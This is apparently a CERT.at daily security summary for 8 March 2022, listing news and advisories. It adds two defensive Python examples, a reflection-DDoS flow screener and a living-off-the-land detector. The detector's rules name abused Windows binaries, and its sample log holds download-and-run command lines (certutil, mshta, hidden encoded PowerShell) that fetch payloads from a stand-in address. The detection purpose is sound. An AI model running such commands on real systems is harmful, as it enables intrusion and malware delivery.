Daily Summary - 08.03.2022

End-of-Day report

Timeframe: Monday 07-03-2022 18:00 - Tuesday 08-03-2022 18:00 Handler: Robert Waldner Co-Handler: Thomas Pribitzer

News

Remote management software with security flaws endangers medical devices

Many medical IoT devices include remote management software from Axeda/PTC. Security vulnerabilities allow attackers to inject malicious code.

https://heise.de/-6542436


Power-saving plug on "getecotex.com" is a scam

On getecotex.com a plug is offered that supposedly saves electricity. For 59 euros it allegedly stabilises the current flow, removes high-frequency current and reduces the energy bill. Beware: these promises are pure invention; no such device exists. You will be defrauded and lose your money!

https://www.watchlist-internet.at/news/stecker-zum-stromsparen-auf-getecotexcom-ist-betrug/


CVE-2022-26143: TP240PhoneHome Reflection/Amplification DDoS Attack Vector

A new reflection/amplification distributed denial of service (DDoS) vector with a record-breaking potential amplification ratio of 4,294,967,296:1 has been abused by attackers in the wild to launch multiple high-impact DDoS attacks. Attacks have been observed on broadband access ISPs, financial institutions, logistics companies, gaming companies, and organizations in other vertical markets. Security researchers, network operators, and security vendors observed these attacks and formed a task force to investigate the new DDoS vector and provide mitigation guidance. Approximately 2,600 Mitel MiCollab and MiVoice Business Express collaboration systems acting as PBX-to-Internet gateways were incorrectly deployed with an abusable system test facility exposed to the public Internet.

https://www.shadowserver.org/news/cve-2022-26143-tp240phonehome-reflection-amplification-ddos-attack-vector/
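
The property that makes this vector dangerous is the packet ratio: one spoofed request to the exposed test facility produces a long stream of packets towards the spoofed source. The following is an added example, not code from the Shadowserver advisory or the task force; it takes only one fact from the advisory (the abused Mitel service listens on UDP/10074) and constructs everything else (a whitespace-separated flow-record format, sample addresses, thresholds) to show how flow data can be screened for hosts in your own ranges that behave as reflectors.

```python
"""Find UDP reflection/amplification candidates in flow records.

Added example for the TP240PhoneHome item; it is not code from the
Shadowserver advisory or the task force. What it takes from the advisory:
the abused Mitel test facility listens on UDP/10074. Everything else (the
whitespace flow-record format, sample addresses, thresholds) is a
constructed assumption for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass

TP240_PORT = 10074  # UDP port of the abused tp240dvr service (from the advisory)


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    packets: int
    nbytes: int


# Constructed sample: one spoofed 60-byte request to the reflector at
# 198.51.100.5 is followed by 500 000 packets towards two victims.
# 198.51.100.6 answers one client once on the same port (ratio 1:1) and
# must not be flagged; the DNS flow is unrelated noise.
SAMPLE_FLOWS = """\
# src          sport  dst            dport  proto packets bytes
203.0.113.9    40000  198.51.100.5   10074  udp   1       60
198.51.100.5   10074  203.0.113.9    40000  udp   250000  35000000
198.51.100.5   10074  203.0.113.10   40000  udp   250000  35000000
192.0.2.7      41000  198.51.100.6   10074  udp   4       240
198.51.100.6   10074  192.0.2.7      41000  udp   4       400
192.0.2.7      5000   198.51.100.5   53     udp   3       200
"""


def parse_flows(lines):
    """Parse 'src sport dst dport proto packets bytes' records; skip comments."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, sport, dst, dport, proto, pkts, nbytes = line.split()
        flows.append(Flow(src, int(sport), dst, int(dport), proto.lower(),
                          int(pkts), int(nbytes)))
    return flows


def find_reflectors(flows, service_port=TP240_PORT, min_targets=2, min_pkt_ratio=10.0):
    """Return {host: stats} for hosts that answer from UDP/service_port to
    several destinations with a packet amplification ratio >= min_pkt_ratio.

    Requests carry spoofed sources, so the ratio is computed per reflector:
    packets/bytes sent *from* the service port divided by packets/bytes
    received *on* it, regardless of who appears to have asked.
    """
    req = defaultdict(lambda: [0, 0])          # host -> [pkts, bytes] received on port
    resp = defaultdict(lambda: [0, 0, set()])  # host -> [pkts, bytes, destinations]
    for f in flows:
        if f.proto != "udp":
            continue
        if f.dport == service_port:
            req[f.dst][0] += f.packets
            req[f.dst][1] += f.nbytes
        elif f.sport == service_port:
            resp[f.src][0] += f.packets
            resp[f.src][1] += f.nbytes
            resp[f.src][2].add(f.dst)
    found = {}
    for host, (rp, rb, targets) in resp.items():
        qp, qb = req[host]
        pkt_ratio = rp / qp if qp else float("inf")
        byte_ratio = rb / qb if qb else float("inf")
        if len(targets) >= min_targets and pkt_ratio >= min_pkt_ratio:
            found[host] = {"targets": len(targets), "packet_ratio": pkt_ratio,
                           "byte_ratio": byte_ratio, "response_packets": rp}
    return found


if __name__ == "__main__":
    for host, stats in find_reflectors(parse_flows(SAMPLE_FLOWS.splitlines())).items():
        print(f"{host}: {stats}")
```

The same function works for any UDP reflector by changing `service_port`; for TP240 the packet ratio is the telling metric because a single request triggers many response packets, which is why the check keys on packets rather than bytes. A flagged host should be taken off the public Internet or have UDP/10074 filtered at the network edge.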


Emotet growing slowly but steadily since November resurgence

The notorious Emotet botnet is still being distributed steadily in the wild, having now infected 92,000 systems in 172 countries.

https://www.bleepingcomputer.com/news/security/emotet-growing-slowly-but-steadily-since-november-resurgence/


An attacker's toolchest: Living off the land

If you've been keeping up with the information security world, you've certainly heard that recent ransomware attacks and other advanced persistent threats sometimes use a special kind of tool. For the most part, though, these tools will be very familiar to you.

https://www.gdatasoftware.com/blog/2022/02/37248-living-off-the-land
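
Because living-off-the-land tooling is the operating system's own binaries, detection has to key on how they are invoked rather than on what runs. The following is an added example, not code from the G DATA post: a small rule set over process-creation events that flags commonly abused switches of built-in Windows binaries and decodes a PowerShell -EncodedCommand payload. The log format ("<timestamp> <user> <image> <command line>", one process per line) and the sample lines are constructed for illustration.

```python
"""Flag living-off-the-land style command lines in process-creation logs.

Added example for the G DATA item; not code from that post. The log format
('<timestamp> <user> <image> <command line>', one process per line) and the
sample lines are constructed for illustration. The rules encode commonly
abused switches of built-in Windows binaries; tune them to your estate.
"""
import base64
import binascii
import re

# (rule name, pattern over the full command line)
LOLBIN_RULES = [
    ("certutil_download",  re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("certutil_decode",    re.compile(r"\bcertutil(\.exe)?\b.*-decode\b", re.I)),
    ("mshta_remote",       re.compile(r"\bmshta(\.exe)?\b.*(https?://|javascript:|vbscript:)", re.I)),
    ("rundll32_script",    re.compile(r"\brundll32(\.exe)?\b.*(javascript:|vbscript:)", re.I)),
    ("regsvr32_scrobj",    re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://.*scrobj\.dll", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("wmic_remote_create", re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("powershell_encoded", re.compile(
        r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s+(?P<blob>\S+)", re.I)),
]
ENCODED_ARG = LOLBIN_RULES[-1][1]

# Constructed sample log. Lines 1-2 are benign (service host, hash check);
# lines 3-5 are a typical download / encoded launcher / remote HTA chain.
SAMPLE_LOG = r"""
2022-03-08T09:12:01Z CORP\alice C:\Windows\System32\svchost.exe svchost.exe -k netsvcs -p
2022-03-08T09:13:44Z CORP\alice C:\Windows\System32\certutil.exe certutil -hashfile installer.msi SHA256
2022-03-08T09:15:02Z CORP\bob C:\Windows\System32\certutil.exe certutil -urlcache -split -f http://198.51.100.7/u.txt u.txt
2022-03-08T09:15:09Z CORP\bob C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -enc dwBoAG8AYQBtAGkA
2022-03-08T09:16:30Z CORP\bob C:\Windows\System32\mshta.exe mshta http://198.51.100.7/p.hta
"""


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("blob"), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_process_log(lines):
    """Return one hit per matching line (first rule that fires), with the
    decoded PowerShell payload attached where applicable."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        # image paths in the constructed format contain no spaces
        ts, user, image, cmdline = line.split(maxsplit=3)
        for name, pattern in LOLBIN_RULES:
            if pattern.search(cmdline):
                hit = {"ts": ts, "user": user, "image": image, "rule": name}
                if name == "powershell_encoded":
                    hit["decoded"] = decode_encoded_command(cmdline)
                hits.append(hit)
                break
    return hits


if __name__ == "__main__":
    for h in scan_process_log(SAMPLE_LOG.splitlines()):
        print(h)
```

The benign certutil hash check is not flagged because the rule requires the -urlcache switch together with a URL; matching on the binary name alone would drown an analyst in noise, which is exactly the problem living-off-the-land tradecraft exploits.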


Android's March 2022 Security Updates Patch 39 Vulnerabilities

Google this week announced the release of patches for 39 vulnerabilities as part of the March 2022 security update for Android. The most serious vulnerability is CVE-2021-39708, a remotely exploitable elevation of privilege issue identified in the System component.

https://www.securityweek.com/androids-march-2022-security-updates-patch-39-vulnerabilities


Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities

We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed - we provide a technical analysis.

https://unit42.paloaltonetworks.com/gke-autopilot-vulnerabilities/


Phishing attempts from FancyBear and Ghostwriter stepping up says Google

Google TAG also sees Chinese Mustang Panda going after Europeans and DDoS attempts against Ukrainian targets.

https://www.zdnet.com/article/phishing-attempts-from-fancybear-and-ghostwriter-stepping-up-says-google/


Daxin Backdoor: In-Depth Analysis, Part One

In the first of a two-part series of blogs, we will delve deeper into Daxin, examining the driver initialization, networking, key exchange, and backdoor functionality of the malware.

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis


FBI Releases Indicators of Compromise for RagnarLocker Ransomware

The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with ransomware attacks by RagnarLocker, a group of ransomware actors targeting critical infrastructure sectors. CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000163-MW and apply the recommended mitigations.

https://us-cert.cisa.gov/ncas/current-activity/2022/03/08/fbi-releases-indicators-compromise-ragnarlocker-ransomware


Ukraine crisis - current information

08.03.2022 16:40 Section "Indirect attack surface" expanded

https://cert.at/de/aktuelles/2022/3/ukraine-krise-aktuelle-informationen

Vulnerabilities

Patch now! Critical security holes in APC Smart-UPS

Attackers could exploit vulnerabilities in Schneider Electric's APC Smart-UPS to inject malicious code or render the devices inoperable.

https://heise.de/-6542950


Security updates for Tuesday

Security updates have been issued by Debian (gif2apng and twisted), Mageia (golang, kernel, and webmin), openSUSE (chromium, cyrus-sasl, and opera), Red Hat (virt:rhel and virt-devel:rhel), Slackware (mozilla), SUSE (cyrus-sasl), and Ubuntu (glibc and redis).

https://lwn.net/Articles/887159/


AVEVA System Platform

This advisory contains mitigations for a Cleartext Storage of Sensitive Information in Memory vulnerability in the AVEVA System Platform, a software management product.

https://us-cert.cisa.gov/ics/advisories/icsa-22-067-02


Sensormatic PowerManage (Update A)

This update advisory is a follow-up to the original advisory titled ICSA-22-034-01 Sensormatic PowerManage that was published February 3, 2022, on the ICS webpage on www.cisa.gov/uscert. This advisory contains mitigations for an Improper Input Validation vulnerability in the Sensormatic PowerManage operating platform. Update A (Part 1 of 1): Upgrade PowerManage to Version 4.10

https://us-cert.cisa.gov/ics/advisories/icsa-22-034-01


D-Link router: vulnerability allows denial of service

https://www.cert-bund.de/advisoryshort/CB-K22-0268


Citrix Federated Authentication Service (FAS) Security Update

https://support.citrix.com/article/CTX341587


Security Bulletin: Vulnerability in IBM Guardium Data Encryption (GDE) (CVE-2021-20414)

https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-guardium-data-encryption-gde-cve-2021-20414-2/


Security Bulletin: Multiple security vulnerabilities are addressed in monthly security fix for IBM Cloud Pak for Business Automation February 2022

https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerability-are-addressed-in-monthly-security-fix-for-ibm-cloud-pak-for-business-automation-february-2022-2/


Security Bulletin: IBM Maximo Asset Management is vulnerable to weak password requirements (CVE-2021-38935)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-weak-password-requirements-cve-2021-38935-2/


Security Bulletin: IBM Cloud Pak System is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45046, CVE-2021-44228)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-system-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-45046-cve-2021-44228-2/


Security Bulletin: IBM Security Directory Integrator has upgraded log4j

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-directory-integrator-has-upgraded-log4j/


Security Bulletin: Multiple Vulnerabilities in WebSphere Application Server Liberty affect IBM Virtualization Engine TS7700 (CVE-2021-35517, CVE-2021-36090)

https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-websphere-application-server-liberty-affect-ibm-virtualization-engine-ts7700-cve-2021-35517-cve-2021-36090-2/


Security Bulletin: A vulnerability has been identified in IBM WebSphere Liberty shipped with IBM Tivoli Netcool Impact (CVE-2021-29842)

https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-identified-in-ibm-websphere-liberty-shipped-with-ibm-tivoli-netcool-impact-cve-2021-29842/


Security Bulletin: IBM Spectrum Control is vulnerable to multiple weaknesses related to IBM Dojo (CVE-2021-234550), Java SE (CVE-2021-35578), IBM WebSphere Application Server - Liberty (CVE-2021-39031), Apache Log4j (CVE-2021-44832) and Gson

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-control-is-vulnerable-to-multiple-weaknesses-related-to-ibm-dojo-cve-2021-234550-java-se-cve-2021-35578-ibm-websphere-application-server-liberty-cve-2021-39031-2/


SSA-250085: Multiple Vulnerabilities in SINEC NMS

https://cert-portal.siemens.com/productcert/txt/ssa-250085.txt


SSA-223353: Multiple Vulnerabilities in Nucleus RTOS based SIMOTICS CONNECT 400

https://cert-portal.siemens.com/productcert/txt/ssa-223353.txt


SSA-166747: Scene File Parsing Vulnerability in Simcenter STAR-CCM+ Viewer before V2022.1

https://cert-portal.siemens.com/productcert/txt/ssa-166747.txt


SSA-155599: File Parsing Vulnerabilities in COMOS

https://cert-portal.siemens.com/productcert/txt/ssa-155599.txt


SSA-148641: XPath Constraint Vulnerability in Mendix Runtime

https://cert-portal.siemens.com/productcert/txt/ssa-148641.txt


SSA-134279: Vulnerability in Mendix Forgot Password Appstore module

https://cert-portal.siemens.com/productcert/txt/ssa-134279.txt


SSA-764417: Multiple Vulnerabilities in RUGGEDCOM Devices

https://cert-portal.siemens.com/productcert/txt/ssa-764417.txt


SSA-594438: Remote Code Execution and Denial-of-Service Vulnerability in multiple RUGGEDCOM ROX products

https://cert-portal.siemens.com/productcert/txt/ssa-594438.txt


SSA-562051: Cross-Site Scripting Vulnerability in Polarion ALM

https://cert-portal.siemens.com/productcert/txt/ssa-562051.txt


SSA-415938: Improper Access Control Vulnerability in Mendix

https://cert-portal.siemens.com/productcert/txt/ssa-415938.txt


SSA-406691: Buffer Vulnerabilities in DHCP function of RUGGEDCOM ROX products

https://cert-portal.siemens.com/productcert/txt/ssa-406691.txt


SSA-389290: Third-Party Component Vulnerabilities in SINEC INS

https://cert-portal.siemens.com/productcert/txt/ssa-389290.txt


SSA-337210: Privilege Escalation Vulnerability in SINUMERIK MC

https://cert-portal.siemens.com/productcert/txt/ssa-337210.txt


SSA-256353: Third-Party Component Vulnerabilities in RUGGEDCOM ROS

https://cert-portal.siemens.com/productcert/txt/ssa-256353.txt


SSA-252466: Multiple Vulnerabilities in Climatix POL909 (AWM and AWB)

https://cert-portal.siemens.com/productcert/txt/ssa-252466.txt